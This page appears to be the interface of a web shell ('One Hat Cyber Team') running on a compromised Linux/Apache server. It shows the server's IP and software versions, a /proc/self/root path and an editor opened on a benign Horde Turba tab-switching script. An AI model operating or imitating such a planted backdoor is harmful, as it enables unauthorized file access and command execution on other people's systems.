⚝
One Hat Cyber Team
⚝
Your IP:
216.73.217.4
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
self
/
root
/
usr
/
share
/
psa-horde
/
turba
/
js
/
Edit File: contact_tabs.js
var TurbaTabs = { // Properties: current, tabs showTab: function(tab) { var next, id; this.tabs.each(function(item) { id = item.id.substring(3); if (id == tab) { item.addClassName('horde-active'); $(id).show(); next = id; } else { item.removeClassName('horde-active'); if ($(id).visible() && !Object.isUndefined(window['sections_Turba_View_' + id])) { this.current = window['sections_Turba_View_' + id]._get(); } $(id).hide(); } }, this); if (this.current && !Object.isUndefined(window['sections_Turba_View_' + next])) { window['sections_Turba_View_' + next].toggle(this.current); } return false; }, onDomLoad: function() { this.tabs = $('page').select('.horde-buttonbar')[0].down().select('li'); } }; document.observe('dom:loaded', TurbaTabs.onDomLoad.bind(TurbaTabs));
Simpan